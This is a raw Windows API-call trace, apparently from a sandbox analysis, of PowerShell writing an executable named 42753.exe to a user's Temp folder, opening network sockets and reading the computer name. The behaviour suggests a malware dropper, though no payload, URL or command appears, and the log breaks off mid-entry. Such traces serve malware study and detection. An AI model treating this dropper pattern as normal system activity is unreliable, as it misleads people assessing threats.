[0032.110] GetFileType (hFile=0x3f0) returned 0x1 [0032.110] SetErrorMode (uMode=0x1) returned 0x1 [0032.110] GetFileType (hFile=0x3f0) returned 0x1 [0032.111] GetFileSize (in: hFile=0x3f0, lpFileSizeHigh=0x52ae42c | out: lpFileSizeHigh=0x52ae42c*=0x0) returned 0x65b3 [0032.111] GetLastError () returned 0x0 [0032.111] ReadFile (in: hFile=0x3f0, lpBuffer=0x24cf318, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52ae3e4, lpOverlapped=0x0 | out: lpBuffer=0x24cf318*, lpNumberOfBytesRead=0x52ae3e4*=0x1000, lpOverlapped=0x0) returned 1 [0032.112] GetLastError () returned 0x0 [0032.117] ReadFile (in: hFile=0x3f0, lpBuffer=0x24cf318, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52ae1f4, lpOverlapped=0x0 | out: lpBuffer=0x24cf318*, lpNumberOfBytesRead=0x52ae1f4*=0x1000, lpOverlapped=0x0) returned 1 [0032.117] GetLastError () returned 0x0 [0032.117] ReadFile (in: hFile=0x3f0, lpBuffer=0x24cf318, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52ae09c, lpOverlapped=0x0 | out: lpBuffer=0x24cf318*, lpNumberOfBytesRead=0x52ae09c*=0x1000, lpOverlapped=0x0) returned 1 [0032.117] GetLastError () returned 0x0 [0032.117] ReadFile (in: hFile=0x3f0, lpBuffer=0x24cf318, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52ae09c, lpOverlapped=0x0 | out: lpBuffer=0x24cf318*, lpNumberOfBytesRead=0x52ae09c*=0x1000, lpOverlapped=0x0) returned 1 [0032.117] GetLastError () returned 0x0 [0032.117] ReadFile (in: hFile=0x3f0, lpBuffer=0x24cf318, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52ae09c, lpOverlapped=0x0 | out: lpBuffer=0x24cf318*, lpNumberOfBytesRead=0x52ae09c*=0x1000, lpOverlapped=0x0) returned 1 [0032.117] GetLastError () returned 0x0 [0032.122] ReadFile (in: hFile=0x3f0, lpBuffer=0x24cf318, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52ae1d0, lpOverlapped=0x0 | out: lpBuffer=0x24cf318*, lpNumberOfBytesRead=0x52ae1d0*=0x1000, lpOverlapped=0x0) returned 1 [0032.122] GetLastError () returned 0x0 [0032.122] ReadFile (in: hFile=0x3f0, lpBuffer=0x24cf318, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52ae064, lpOverlapped=0x0 | out: lpBuffer=0x24cf318*, lpNumberOfBytesRead=0x52ae064*=0x5b3, lpOverlapped=0x0) returned 1 [0032.123] GetLastError () returned 0x0 [0032.123] ReadFile (in: hFile=0x3f0, lpBuffer=0x24cf318, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52ae150, lpOverlapped=0x0 | out: lpBuffer=0x24cf318*, lpNumberOfBytesRead=0x52ae150*=0x0, lpOverlapped=0x0) returned 1 [0032.123] GetLastError () returned 0x0 [0032.123] CloseHandle (hObject=0x3f0) returned 1 [0032.123] GetLastError () returned 0x0 [0032.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\pOwerSheLL.config", nBufferLength=0x105, lpBuffer=0x52ae2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\pOwerSheLL.config", lpFilePart=0x0) returned 0x3c [0032.128] GetLastError () returned 0x0 [0032.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\pOwerSheLL.config", nBufferLength=0x105, lpBuffer=0x52ae284, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\pOwerSheLL.config", lpFilePart=0x0) returned 0x3c [0032.128] GetLastError () returned 0x0 [0032.128] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4785d60, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\pOwerSheLL.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0032.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\pOwerSheLL.exe", nBufferLength=0x105, lpBuffer=0x52ae308, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\pOwerSheLL.exe", lpFilePart=0x0) returned 0x39 [0032.128] GetLastError () returned 0x0 [0032.128] GetCurrentProcess () returned 0xffffffff [0032.128] GetLastError () returned 0x3f0 [0032.128] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52ae6ac | out: TokenHandle=0x52ae6ac*=0x3f0) returned 1 [0032.128] GetLastError () returned 0x3f0 [0032.129] GetCurrentProcess () returned 0xffffffff [0032.129] GetLastError () returned 0x3f0 [0032.129] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52ae6ac | out: TokenHandle=0x52ae6ac*=0x3ec) returned 1 [0032.129] GetLastError () returned 0x3f0 [0032.129] GetCurrentProcess () returned 0xffffffff [0032.129] GetLastError () returned 0x3f0 [0032.129] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52ae41c | out: TokenHandle=0x52ae41c*=0x3fc) returned 1 [0032.129] GetLastError () returned 0x3f0 [0032.130] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\pOwerSheLL.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x52ae45c | out: lpFileInformation=0x52ae45c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0032.130] GetLastError () returned 0x2 [0032.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\pOwerSheLL.config", nBufferLength=0x105, lpBuffer=0x52adf74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\pOwerSheLL.config", lpFilePart=0x0) returned 0x3c [0032.130] GetLastError () returned 0x2 [0032.130] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\pOwerSheLL.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x52ae458 | out: lpFileInformation=0x52ae458*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0032.130] GetLastError () returned 0x2 [0032.130] GetCurrentProcess () returned 0xffffffff [0032.130] GetLastError () returned 0x3f0 [0032.130] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52ae6ac | out: TokenHandle=0x52ae6ac*=0x400) returned 1 [0032.130] GetLastError () returned 0x3f0 [0032.130] GetCurrentProcess () returned 0xffffffff [0032.130] GetLastError () returned 0x3f0 [0032.130] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52ae6ac | out: TokenHandle=0x52ae6ac*=0x404) returned 1 [0032.130] GetLastError () returned 0x3f0 [0032.147] GetCurrentProcess () returned 0xffffffff [0032.147] GetLastError () returned 0x3f0 [0032.147] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52ae488 | out: TokenHandle=0x52ae488*=0x408) returned 1 [0032.147] GetLastError () returned 0x3f0 [0032.165] GetCurrentProcess () returned 0xffffffff [0032.165] GetLastError () returned 0x3f0 [0032.165] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52ae498 | out: TokenHandle=0x52ae498*=0x40c) returned 1 [0032.165] GetLastError () returned 0x3f0 [0032.171] GetLongPathNameW (in: lpszShortPath="C:\\Users\\BGC6U8~1\\", lpszLongPath=0x52ae37c, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\BGC6u8Oy yXGxkR\\") returned 0x19 [0032.171] GetLastError () returned 0x3f0 [0032.171] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Temp\\42753.exe", nBufferLength=0x105, lpBuffer=0x52ae3a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Temp\\42753.exe", lpFilePart=0x0) returned 0x35 [0032.171] GetLastError () returned 0x3f0 [0032.171] SetErrorMode (uMode=0x1) returned 0x1 [0032.171] CreateFileW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Temp\\42753.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\temp\\42753.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x410 [0032.172] GetLastError () returned 0x0 [0032.172] GetFileType (hFile=0x410) returned 0x1 [0032.172] SetErrorMode (uMode=0x1) returned 0x1 [0032.172] GetFileType (hFile=0x410) returned 0x1 [0032.173] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x414 [0032.173] GetLastError () returned 0x0 [0032.173] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x418 [0032.173] GetLastError () returned 0x0 [0032.705] GetCurrentProcess () returned 0xffffffff [0032.705] GetLastError () returned 0x3f0 [0032.705] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52ae4ac | out: TokenHandle=0x52ae4ac*=0x41c) returned 1 [0032.705] GetLastError () returned 0x3f0 [0032.708] GetCurrentProcess () returned 0xffffffff [0032.708] GetLastError () returned 0x3f0 [0032.708] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52ae4bc | out: TokenHandle=0x52ae4bc*=0x420) returned 1 [0032.708] GetLastError () returned 0x3f0 [0032.718] GetCurrentProcess () returned 0xffffffff [0032.718] GetLastError () returned 0x3f0 [0032.718] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52ae480 | out: TokenHandle=0x52ae480*=0x424) returned 1 [0032.718] GetLastError () returned 0x3f0 [0032.721] GetCurrentProcess () returned 0xffffffff [0032.721] GetLastError () returned 0x3f0 [0032.721] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52ae490 | out: TokenHandle=0x52ae490*=0x428) returned 1 [0032.721] GetLastError () returned 0x3f0 [0032.723] GetCurrentProcess () returned 0xffffffff [0032.723] GetLastError () returned 0x3f0 [0032.723] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52ae784 | out: TokenHandle=0x52ae784*=0x42c) returned 1 [0032.724] GetLastError () returned 0x3f0 [0032.733] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x52ad7e4 | out: phkResult=0x52ad7e4*=0x430) returned 0x0 [0032.733] RegQueryValueExW (in: hKey=0x430, lpValueName="InstallationType", lpReserved=0x0, lpType=0x52ad82c, lpData=0x0, lpcbData=0x52ad828*=0x0 | out: lpType=0x52ad82c*=0x1, lpData=0x0, lpcbData=0x52ad828*=0xe) returned 0x0 [0032.733] RegQueryValueExW (in: hKey=0x430, lpValueName="InstallationType", lpReserved=0x0, lpType=0x52ad82c, lpData=0x4785d60, lpcbData=0x52ad828*=0xe | out: lpType=0x52ad82c*=0x1, lpData="Client", lpcbData=0x52ad828*=0xe) returned 0x0 [0032.733] RegCloseKey (hKey=0x430) returned 0x0 [0032.757] RasEnumConnectionsW (in: param_1=0x47877b0, param_2=0x52ae7fc, param_3=0x52ae800 | out: param_1=0x47877b0, param_2=0x52ae7fc, param_3=0x52ae800) returned 0x0 [0032.773] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x47877b0 | out: lpWSAData=0x47877b0) returned 0 [0032.777] GetLastError () returned 0x0 [0032.779] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x470 [0032.799] GetLastError () returned 0x0 [0032.799] setsockopt (s=0x470, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0032.800] GetLastError () returned 0x273a [0032.800] closesocket (s=0x470) returned 0 [0032.800] GetLastError () returned 0x0 [0032.800] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x470 [0032.809] GetLastError () returned 0x0 [0032.809] setsockopt (s=0x470, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0032.809] GetLastError () returned 0x273a [0032.809] closesocket (s=0x470) returned 0 [0032.809] GetLastError () returned 0x0 [0032.812] GetCurrentProcess () returned 0xffffffff [0032.812] GetLastError () returned 0x3f0 [0032.812] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52ae368 | out: TokenHandle=0x52ae368*=0x470) returned 1 [0032.812] GetLastError () returned 0x3f0 [0032.815] GetCurrentProcess () returned 0xffffffff [0032.815] GetLastError () returned 0x3f0 [0032.815] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52ae378 | out: TokenHandle=0x52ae378*=0x474) returned 1 [0032.815] GetLastError () returned 0x3f0 [0032.826] GetCurrentProcessId () returned 0xa68 [0032.827] GetComputerNameW (in: lpBuffer=0x47877b0, nSize=0x24f0330 | out: lpBuffer="F71GWAT", nSize=0x24f0330) returned 1 [0032.828] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x52ae5cc | out: phkResult=0x52ae5cc*=0x478) returned 0x0 [0032.828] RegQueryValueExW (in: hKey=0x478, lpValueName="Library", lpReserved=0x0, lpType=0x52ae614, lpData=0x0, lpcbData=0x52ae610*=0x0 | out: lpType=0x52ae614*=0x1, lpData=0x0, lpcbData=0x52ae610*=0x1c) returned 0x0 [0032.828] RegQueryValueExW (in: hKey=0x478, lpValueName="Library", lpReserved=0x0, lpType=0x52ae614, lpData=0x47877b0, lpcbData=0x52ae610*=0x1c | out: lpType=0x52ae614*=0x1, lpData="netfxperf.dll", lpcbData=0x52ae610*=0x1c) returned 0x0 [0032.828] RegQueryValueExW (in: hKey=0x478, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x52ae614, lpData=0x0, lpcbData=0x52ae610*=0x0 | out: lpType=0x52ae614*=0x4, lpData=0x0, lpcbData=0x52ae610*=0x4) returned 0x0 [0032.829] RegQueryValueExW (in: hKey=0x478, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x52ae614, lpData=0x52ae600, lpcbData=0x52ae610*=0x4 | out: lpType=0x52ae614*=0x4, lpData=0x52ae600*=0x1, lpcbData=0x52ae610*=0x4) returned 0x0 [0032.829] RegQueryValueExW (in: hKey=0x478, lpValueName="First Counter", lpReserved=0x0, lpType=0x52ae614, lpData=0x0, lpcbData=0x52ae610*=0x0 | out: lpType=0x52ae614*=0x4, lpData=0x0, lpcbData=0x52ae610*=0x4) returned 0x0 [0032.829] RegQueryValueExW (in: hKey=0x478, lpValueName="First Counter", lpReserved=0x0, lpType=0x52ae614, lpData=0x52ae600, lpcbData=0x52ae610*=0x4 | out: lpType=0x52ae614*=0x4, lpData=0x52ae600*=0x1040, lpcbData=0x52ae610*=0x4) returned 0x0 [0032.829] RegCloseKey (hKey=0x478) returned 0x0 [0032.830] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x52ae5c8 | out: phkResult=0x52ae5c8*=0x478) returned 0x0 [0032.830] RegQueryValueExW (in: hKey=0x478, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x52ae610, lpData=0x0, lpcbData=0x52ae60c*=0x0 | out: lpType=0x52ae610*=0x4, lpData=0x0, lpcbData=0x52ae60c*=0x4) returned 0x0 [0032.830] RegQueryValueExW (in: hKey=0x478, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x52ae610, lpData=0x52ae5fc, lpcbData=0x52ae60c*=0x4 | out: lpType=0x52ae610*=0x4, lpData=0x52ae5fc*=0x3, lpcbData=0x52ae60c*=0x4) returned 0x0 [0032.830] RegQueryValueExW (in: hKey=0x478, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x52ae610, lpData=0x0, lpcbData=0x52ae60c*=0x0 | out: lpType=0x52ae610*=0x4, lpData=0x0, lpcbData=0x52ae60c*=0x4) returned 0x0 [0032.830] RegQueryValueExW (in: hKey=0x478, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x52ae610, lpData=0x52ae5fc, lpcbData=0x52ae60c*=0x4 | out: lpType=0x52ae610*=0x4, lpData=0x52ae5fc*=0x20000, lpcbData=0x52ae60c*=0x4) returned 0x0 [0032.830] RegQueryValueExW (in: hKey=0x478, lpValueName="Counter Names", lpReserved=0x0, lpType=0x52ae610, lpData=0x0, lpcbData=0x52ae60c*=0x0 | out: lpType=0x52ae610*=0x3, lpData=0x0, lpcbData=0x52ae60c*=0xaa) returned 0x0 [0032.831] RegQueryValueExW (in: hKey=0x478, lpValueName="Counter Names", lpReserved=0x0, lpType=0x52ae610, lpData=0x24f2a60, lpcbData=0x52ae60c*=0xaa | out: lpType=0x52ae610*=0x3, lpData=0x24f2a60*, lpcbData=0x52ae60c*=0xaa) returned 0x0 [0032.833] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0032.834] GetLastError () returned 0x0 [0032.836] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0xe4a58, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x47c [0032.836] GetLastError () returned 0x0 [0032.837] MapViewOfFile (hFileMappingObject=0x47c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x48d0000 [0032.838] VirtualQuery (in: lpAddress=0x48d0000, lpBuffer=0x52ae5e0, dwLength=0x1c | out: lpBuffer=0x52ae5e0*(BaseAddress=0x48d0000, AllocationBase=0x48d0000, AllocationProtect=0x4, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c [0032.838] GetLastError () returned 0x0 [0032.838] LocalFree (hMem=0x477d6e8) returned 0x0 [0032.838] RegCloseKey (hKey=0x478) returned 0x0 [0032.840] GetVersionExW (in: lpVersionInformation=0x47877b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x47877b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0032.840] GetLastError () returned 0x0 [0032.840] GetVersionExW (in: lpVersionInformation=0x47877b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x47877b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0032.840] GetLastError () returned 0x0 [0032.841] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x24f34c8, cbSid=0x52ae5c0 | out: pSid=0x24f34c8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x52ae5c0) returned 1 [0032.841] GetLastError () returned 0x0 [0032.843] CreateMutexW (lpMutexAttributes=0x24f3600, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x478 [0032.843] GetLastError () returned 0x0 [0032.844] WaitForSingleObject (hHandle=0x478, dwMilliseconds=0x1f4) returned 0x0 [0032.844] GetLastError () returned 0x0 [0032.844] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x24f37d4, cbSid=0x52ae580 | out: pSid=0x24f37d4*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x52ae580) returned 1 [0032.844] GetLastError () returned 0x0 [0032.844] CreateMutexW (lpMutexAttributes=0x24f38e4, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0 [0032.844] GetLastError () returned 0x5 [0032.846] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x480 [0032.846] GetLastError () returned 0x5 [0032.846] WaitForSingleObject (hHandle=0x480, dwMilliseconds=0x1f4) returned 0x0 [0032.846] GetLastError () returned 0x5 [0032.846] ReleaseMutex (hMutex=0x480) returned 1 [0032.846] GetLastError () returned 0x5 [0032.846] CloseHandle (hObject=0x480) returned 1 [0032.846] GetLastError () returned 0x5 [0032.846] GetCurrentProcessId () returned 0xa68 [0032.847] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa68) returned 0x480 [0032.847] GetLastError () returned 0x5 [0032.848] GetProcessTimes (in: hProcess=0x480, lpCreationTime=0x52ae584, lpExitTime=0x52ae57c, lpKernelTime=0x52ae57c, lpUserTime=0x52ae57c | out: lpCreationTime=0x52ae584, lpExitTime=0x52ae57c, lpKernelTime=0x52ae57c, lpUserTime=0x52ae57c) returned 1 [0032.848] GetLastError () returned 0x5 [0032.849] CloseHandle (hObject=0x480) returned 1 [0032.849] GetLastError () returned 0x5 [0032.849] ReleaseMutex (hMutex=0x478) returned 1 [0032.849] GetLastError () returned 0x5 [0032.849] CloseHandle (hObject=0x478) returned 1 [0032.849] GetLastError () returned 0x5 [0032.849] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x24f41c8, cbSid=0x52ae5c0 | out: pSid=0x24f41c8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x52ae5c0) returned 1 [0032.849] GetLastError () returned 0x5 [0032.850] CreateMutexW (lpMutexAttributes=0x24f42d8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x478 [0032.850] GetLastError () returned 0x0 [0032.850] WaitForSingleObject (hHandle=0x478, dwMilliseconds=0x1f4) returned 0x0 [0032.850] GetLastError () returned 0x0 [0032.850] ReleaseMutex (hMutex=0x478) returned 1 [0032.850] GetLastError () returned 0x0 [0032.850] CloseHandle (hObject=0x478) returned 1 [0032.850] GetLastError () returned 0x0 [0032.850] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x24f4a4c, cbSid=0x52ae5c0 | out: pSid=0x24f4a4c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x52ae5c0) returned 1 [0032.850] GetLastError () returned 0x0 [0032.850] CreateMutexW (lpMutexAttributes=0x24f4b5c, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x478 [0032.850] GetLastError () returned 0x0 [0032.850] WaitForSingleObject (hHandle=0x478, dwMilliseconds=0x1f4) returned 0x0 [0032.851] GetLastError () returned 0x0 [0032.851] ReleaseMutex (hMutex=0x478) returned 1 [0032.851] GetLastError () returned 0x0 [0032.851] CloseHandle (hObject=0x478) returned 1 [0032.851] GetLastError () returned 0x0 [0032.851] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x24f52d4, cbSid=0x52ae5c0 | out: pSid=0x24f52d4*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x52ae5c0) returned 1 [0032.851] GetLastError () returned 0x0 [0032.851] CreateMutexW (lpMutexAttributes=0x24f53e4, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x478 [0032.851] GetLastError () returned 0x0 [0032.851] WaitForSingleObject (hHandle=0x478, dwMilliseconds=0x1f4) returned 0x0 [0032.851] GetLastError () returned 0x0 [0032.851] ReleaseMutex (hMutex=0x478) returned 1 [0032.851] GetLastError () returned 0x0 [0032.851] CloseHandle (hObject=0x478) returned 1 [0032.851] GetLastError () returned 0x0 [0032.851] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x24f5b54, cbSid=0x52ae5c0 | out: pSid=0x24f5b54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x52ae5c0) returned 1 [0032.852] GetLastError () returned 0x0 [0032.852] CreateMutexW (lpMutexAttributes=0x24f5c64, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x478 [0032.852] GetLastError () returned 0x0 [0032.852] WaitForSingleObject (hHandle=0x478, dwMilliseconds=0x1f4) returned 0x0 [0032.852] GetLastError () returned 0x0 [0032.852] ReleaseMutex (hMutex=0x478) returned 1 [0032.852] GetLastError () returned 0x0 [0032.852] CloseHandle (hObject=0x478) returned 1 [0032.852] GetLastError () returned 0x0 [0032.852] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x24f63d0, cbSid=0x52ae5b8 | out: pSid=0x24f63d0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x52ae5b8) returned 1 [0032.852] GetLastError () returned 0x0 [0032.853] CreateMutexW (lpMutexAttributes=0x24f64e0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x478 [0032.853] GetLastError () returned 0x0 [0032.853] WaitForSingleObject (hHandle=0x478, dwMilliseconds=0x1f4) returned 0x0 [0032.853] GetLastError () returned 0x0 [0032.853] ReleaseMutex (hMutex=0x478) returned 1 [0032.853] GetLastError () returned 0x0 [0032.853] CloseHandle (hObject=0x478) returned 1 [0032.853] GetLastError () returned 0x0 [0032.853] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x24f6c58, cbSid=0x52ae5b8 | out: pSid=0x24f6c58*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x52ae5b8) returned 1 [0032.853] GetLastError () returned 0x0 [0032.853] CreateMutexW (lpMutexAttributes=0x24f6d68, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x478 [0032.853] GetLastError () returned 0x0 [0032.853] WaitForSingleObject (hHandle=0x478, dwMilliseconds=0x1f4) returned 0x0 [0032.853] GetLastError () returned 0x0 [0032.853] ReleaseMutex (hMutex=0x478) returned 1 [0032.853] GetLastError () returned 0x0 [0032.854] CloseHandle (hObject=0x478) returned 1 [0032.854] GetLastError () returned 0x0 [0032.854] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x24f74bc, cbSid=0x52ae5b8 | out: pSid=0x24f74bc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x52ae5b8) returned 1 [0032.854] GetLastError () returned 0x0 [0032.854] CreateMutexW (lpMutexAttributes=0x24f75cc, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x478 [0032.854] GetLastError () returned 0x0 [0032.854] WaitForSingleObject (hHandle=0x478, dwMilliseconds=0x1f4) returned 0x0 [0032.854] GetLastError () returned 0x0 [0032.854] ReleaseMutex (hMutex=0x478) returned 1 [0032.854] GetLastError () returned 0x0 [0032.854] CloseHandle (hObject=0x478) returned 1 [0032.854] GetLastError () returned 0x0 [0032.854] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x24f7d30, cbSid=0x52ae5b8 | out: pSid=0x24f7d30*(Revision=0x1, SubAuthorityCount=0x1, 